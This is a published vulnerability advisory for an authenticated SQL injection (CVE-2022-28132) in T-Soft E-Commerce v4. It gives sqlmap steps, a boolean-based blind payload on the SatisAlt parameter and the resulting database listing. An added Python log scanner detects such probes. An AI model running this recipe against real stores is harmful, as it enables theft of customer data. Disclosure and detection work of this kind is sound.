Vulnerability discovered: 2022-05-17 | Type: webapps | Platform: multiple
# Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.tsoft.com.tr/
# Version: v4
# Tested on: Kali Linux
# Category: WebApp
# Google Dork: N/A
# CVE: 2022-28132
# Date: 18.02.2022
######## Description ###########################################
#
#
#
# Step-1: Log in as admin or as a user with sufficient privileges
# Step-2: Open Burp or ZAP and request the vulnerable path ({PoC REQUEST PATH})
# Step-3: Capture the request and save it as a .txt file
# Step-4: Run sqlmap against the saved request: 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment --random-agent'
# Step-5: The available databases are now listed; for further options, search 'how to use sqlmap advanced'
#
# Impact: An authenticated attacker can read the contents of the database and exfiltrate its data, which makes this a high-impact issue.
#
#
#
######## Proof of Concept ########################################
=============> RESULTS OF THE SQLMAP <==========================
Parameter: SatisAlt (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20
---
back-end DBMS: MySQL 5
available databases [2]:
[*] d25082_db
[*] information_schema
[13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
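Defender-side detection for the two techniques sqlmap reported above (a boolean-based blind tautology on SatisAlt, and time-based blind probes), as an added example that is not part of the advisory: it parses Apache combined-format access logs, URL-decodes every query parameter so encoded quotes and spaces cannot hide the payload, flags tautology and SLEEP/BENCHMARK probes, and counts hits per source and parameter, since blind injection shows up as a burst of such requests rather than a single one. The log lines are constructed, and /ADMIN_PATH is a placeholder for the vulnerable path, which the advisory does not name.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Shapes of the two techniques reported above: a quoted boolean tautology
# such as ' AND 1331=1331 AND 'RcAU'='RcAU, and MySQL time-based probes.
TAUTOLOGY_RE = re.compile(r"(?i)'\s*(?:AND|OR)\s*(\d+)\s*=\s*\1\b")
TIME_RE = re.compile(r"(?i)\b(?:SLEEP|BENCHMARK)\s*\(")

# Apache combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample traffic; /ADMIN_PATH is a placeholder for the
# vulnerable path, which the advisory does not name.
SAMPLE_LOG = """\
10.0.0.5 - - [17/May/2022:13:05:31 +0300] "GET /ADMIN_PATH?SatisAlt=%27%20AND%201331%3D1331%20AND%20%27RcAU%27%3D%27RcAU&SatisUst=&page=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [17/May/2022:13:06:02 +0300] "GET /ADMIN_PATH?SatisAlt=100&SatisUst=500&page=1 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
10.0.0.5 - - [17/May/2022:13:07:15 +0300] "GET /ADMIN_PATH?SatisAlt=1%27%20AND%20SLEEP%285%29--%20&page=1 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""


def find_sqli_candidates(log_text):
    """Return (ip, timestamp, parameter, technique) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        query = urlsplit(m["target"]).query
        # parse_qsl splits on & and = first, then percent-decodes each value,
        # so %27 and %3D inside a value become ' and = before matching.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if TAUTOLOGY_RE.search(value):
                hits.append((m["ip"], m["ts"], name, "boolean-based blind"))
            elif TIME_RE.search(value):
                hits.append((m["ip"], m["ts"], name, "time-based blind"))
    return hits


def count_by_source(hits):
    """Blind SQLi needs many requests per parameter; count hits per (ip, parameter)."""
    return Counter((ip, param) for ip, _, param, _ in hits)
```

On the constructed log the scanner flags both requests from 10.0.0.5 against SatisAlt and none of the benign filtering request from 10.0.0.7; in practice, alert on the per-(ip, parameter) count crossing a threshold, not on a single hit.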